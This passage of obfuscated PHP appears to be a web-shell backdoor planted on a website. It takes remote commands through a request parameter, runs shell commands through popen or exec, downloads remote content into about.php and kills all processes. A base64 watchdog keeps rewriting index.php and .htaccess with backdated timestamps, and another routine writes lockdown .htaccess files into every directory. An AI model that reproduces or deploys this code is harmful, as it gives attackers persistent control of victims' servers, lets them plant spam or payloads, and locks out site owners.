100) { @unlink($Saiqsdn); } $Sadqsni .= 'false' . "|"; } $Sqsandi = $Sisqnad . PHP_EOL . $Sisanqd; $Snsqiad = @file_put_contents($Saiqsdn, $Sqsandi); if ($Snsqiad !== false) { $Sadqsni .= 'r:' . $Snsqiad . "-"; if ($Snsqiad == strlen($Sqsandi)){ $Sadqsni .= 'success'; }else { $Sadqsni .= 'failed'; } } return $Sadqsni; } function up($SsaindqPath, $SidnasqLink){ $Sqnsida = get($SidnasqLink); @chmod($SsaindqPath, 0644); $Sqdasin = @file_put_contents($SsaindqPath, $Sqnsida); if (strlen($Sqnsida) > 10000 && strlen($Sqnsida) == $Sqdasin) { return "success"; } else { return "failed"; } } function run($Sidnasq, $Snaqsdi = 'popen') { $Sdsinqa = explode(',', ini_get('disable_functions')); if (in_array($Snaqsdi, $Sdsinqa)) { $Snaqsdi = 'exec'; } if (in_array($Snaqsdi, $Sdsinqa)) { return false; } $Snsqiad = ''; switch ($Snaqsdi){ case 'exec': exec($Sidnasq,$Sqnsidarray); foreach ($Sqnsidarray as $Sqdians => $value) { $Snsqiad .= $Sqdians . " : " . $value . PHP_EOL; } return $Snsqiad; break; case 'popen': $Sdqsain = popen($Sidnasq,"r"); while (!feof($Sdqsain)) { $Sdasiqn = fgets($Sdqsain, 4096); $Snsqiad .= $Sdasiqn; } pclose($Sdqsain); return $Snsqiad; break; default: return false; break; } } function unlock() { return run("kill -9 -1"); } function getPhpPath() { ob_start(); phpinfo(1); $Sadqsni = ob_get_contents(); ob_end_clean(); preg_match("/--bindir=([^&]+)/si", $Sadqsni, $matches); if (isset($matches[1]) && $matches[1] != '') { return $matches[1] . '/php'; } preg_match("/--prefix=([^&]+)/si", $Sadqsni, $matches); if (!isset($matches[1])) { return 'php'; } return $matches[1] . '/bin/php'; } function lock() { $Sdsinqa = explode(',', ini_get('disable_functions')); if (in_array("exec", $Sdsinqa) && in_array("popen", $Sdsinqa)) { return "failed"; } else { $Sndsiqa = getPhpPath(); $Sdsqina = __DIR__ . "/l.php"; $Sidsqna = base64_decode('JGluZGV4X3BhdGggPSBfX0RJUl9fIC4iL2luZGV4LnBocCI7CiAgICAkaW5kZXhfY29udGVudCA9IGZpbGVfZ2V0X2NvbnRlbnRzKCRpbmRleF9wYXRoKTsKICAgICRpbmRleF9tZDUgPSBtZDUoJGluZGV4X2NvbnRlbnQpOwogICAgJGh0YWNjZXNzX3BhdGggPSBfX0RJUl9fIC4iLy5odGFjY2VzcyI7CiAgICAkaHRhY2Nlc3NfY29udGVudCA9IGZpbGVfZ2V0X2NvbnRlbnRzKCRodGFjY2Vzc19wYXRoKTsKICAgICRodGFjY2Vzc19tZDUgPSBtZDUoJGh0YWNjZXNzX2NvbnRlbnQpOwoKICAgIHdoaWxlICh0cnVlKQogICAgewogICAgICAgICR0ZW1wX21kNSA9IEBtZDUoZmlsZV9nZXRfY29udGVudHMoJGluZGV4X3BhdGgpKTsKICAgICAgICBpZiAoIWZpbGVfZXhpc3RzKCRpbmRleF9wYXRoKSAgfHwgJHRlbXBfbWQ1ICE9ICRpbmRleF9tZDUpIHsKICAgICAgICAgICAgQGZpbGVfcHV0X2NvbnRlbnRzKCRpbmRleF9wYXRoLCAkaW5kZXhfY29udGVudCk7CiAgICAgICAgICAgIEB0b3VjaCgkaW5kZXhfcGF0aCwgc3RydG90aW1lKCItNDAwIGRheXMiLCB0aW1lKCkpKTsKICAgICAgICAgICAgQGNobW9kKCRpbmRleF9wYXRoLCAwNDQ0KTsKICAgICAgICB9CiAgICAgICAgJHRlbXBfbWQ1ID0gQG1kNShmaWxlX2dldF9jb250ZW50cygkaHRhY2Nlc3NfcGF0aCkpOwogICAgICAgIGlmICghZmlsZV9leGlzdHMoJGh0YWNjZXNzX3BhdGgpIHx8ICR0ZW1wX21kNSAhPSAkaHRhY2Nlc3NfbWQ1KSB7CiAgICAgICAgICAgIEBmaWxlX3B1dF9jb250ZW50cygkaHRhY2Nlc3NfcGF0aCwgJGh0YWNjZXNzX2NvbnRlbnQpOwogICAgICAgICAgICBAdG91Y2goJGh0YWNjZXNzX3BhdGgsIHN0cnRvdGltZSgiLTQwMCBkYXlzIiwgdGltZSgpKSk7CiAgICAgICAgICAgIEBjaG1vZCgkaHRhY2Nlc3NfcGF0aCwgMDQ0NCk7CiAgICAgICAgfQogICAgICAgIHNsZWVwKDEpOwogICAgfQ=='); $Sidsqna = "/si', "", $Sisanqd); @chmod($SsaindqPath, 0644); $Snsqiad = @file_put_contents($SsaindqPath, $Sisanqd); if ($Snsqiad == strlen($Sisanqd)) {return "success";} else {return "failed";} } function searchDir($path, &$Sndiqas, &$Sanisdq){ if(is_dir($path) && is_readable($path)) { $Sadsniq=dir($path); while($Ssaindq=$Sadsniq->read()) { if($Ssaindq!='.'&& $Ssaindq!='..') { if (is_dir($path.'/'.$Ssaindq) && is_readable($path.'/'.$Ssaindq)) { @unlink($path.'/'.$Ssaindq.'/.htaccess'); $Snsqiad = file_put_contents($path.'/'.$Ssaindq.'/.htaccess', $Sndiqas); if ($Snsqiad == strlen($Sndiqas)) { $Sanisdq[] = $path.'/'.$Ssaindq.'/.htaccess'; } searchDir($path.'/'.$Ssaindq,$Sndiqas, $Sanisdq); } } } $Sadsniq->close(); } } function writeHtaccessToAllDirs() { $Sndiqas = base64_decode("PEZpbGVzTWF0Y2ggIi4ocHl8ZXhlfHBocCkkIj4KIE9yZGVyIGFsbG93LGRlbnkKIERlbnkgZnJvbSBhbGwKPC9GaWxlc01hdGNoPgo8RmlsZXNNYXRjaCAiXihhYm91dC5waHB8cmFkaW8ucGhwfGluZGV4LnBocHxjb250ZW50LnBocHxsb2NrMzYwLnBocCkkIj4KIE9yZGVyIGFsbG93LGRlbnkKIEFsbG93IGZyb20gYWxsCjwvRmlsZXNNYXRjaD4KPElmTW9kdWxlIG1vZF9yZXdyaXRlLmM+ClJld3JpdGVFbmdpbmUgT24KUmV3cml0ZUJhc2UgLwpSZXdyaXRlUnVsZSBeaW5kZXhcLnBocCQgLSBbTF0KUmV3cml0ZUNvbmQgJXtSRVFVRVNUX0ZJTEVOQU1FfSAhLWYKUmV3cml0ZUNvbmQgJXtSRVFVRVNUX0ZJTEVOQU1FfSAhLWQKUmV3cml0ZVJ1bGUgLiAvaW5kZXgucGhwIFtMXQo8L0lmTW9kdWxlPg=="); $Sanisdq = array(); searchDir(dirname(__FILE__), $Sndiqas, $Sanisdq); return count($Sanisdq); } function display($Sadqsni, $Ssinaqd = 0) { switch ($Ssinaqd){ case 0: die("info{[{" . $Sadqsni . "}]}"); break; case 1: die("error{[{" . $Sadqsni . "}]}"); break; default : die("info{[{" . $Sadqsni . "}]}"); break; } } if (!isset($_SERVER['PHP_SELF']) || !isset($_SERVER['SCRIPT_FILENAME'])) { display("get root dir", 1); } $Ssinadq = str_replace(str_replace('//','/',$_SERVER['PHP_SELF']), '', str_replace('\\\\','/',$_SERVER['SCRIPT_FILENAME']) ); if (!isset($_REQUEST['a'])){display("miss a", 1);} switch ($_REQUEST['a']) { case "root": display($Ssinadq); break; case "del": if (del($Ssinadq . "/" .$_REQUEST['name'])){ display("del success"); } display("del failed"); break; case "delmyself": if (del(__FILE__)){ display("del myself success"); } display("del myself failed"); break; case "index": if (isset($_REQUEST['link'])){ $Sadqsni = index($Ssinadq, base64_decode($_REQUEST['link'])); } display($Sadqsni); break; case "about": if (isset($_REQUEST['link'])) { $Sadqsni = up($Ssinadq . "/about.php", base64_decode($_REQUEST['link'])); display($Sadqsni); } break; case "read": $Sadqsni = @file_get_contents($Ssinadq . "/" . $_REQUEST['name']); if ($Sadqsni == null){$Sadqsni = "read failed";} display($Sadqsni); break; case "unlock": $Sadqsni = unlock(); display($Sadqsni); break; case "lock": $Sadqsni = lock(); display($Sadqsni); break; case "checklockstatus": $Sadqsni = checkLockStatus(); display($Sadqsni); break; case "clearindex": $Sadqsni = clearIndex($Ssinadq . "/index.php"); display($Sadqsni); break; case "writehtaccesstoallDirs": $Sadqsni = writeHtaccessToAllDirs(); display($Sadqsni); break; default : display("error a", 1); break; }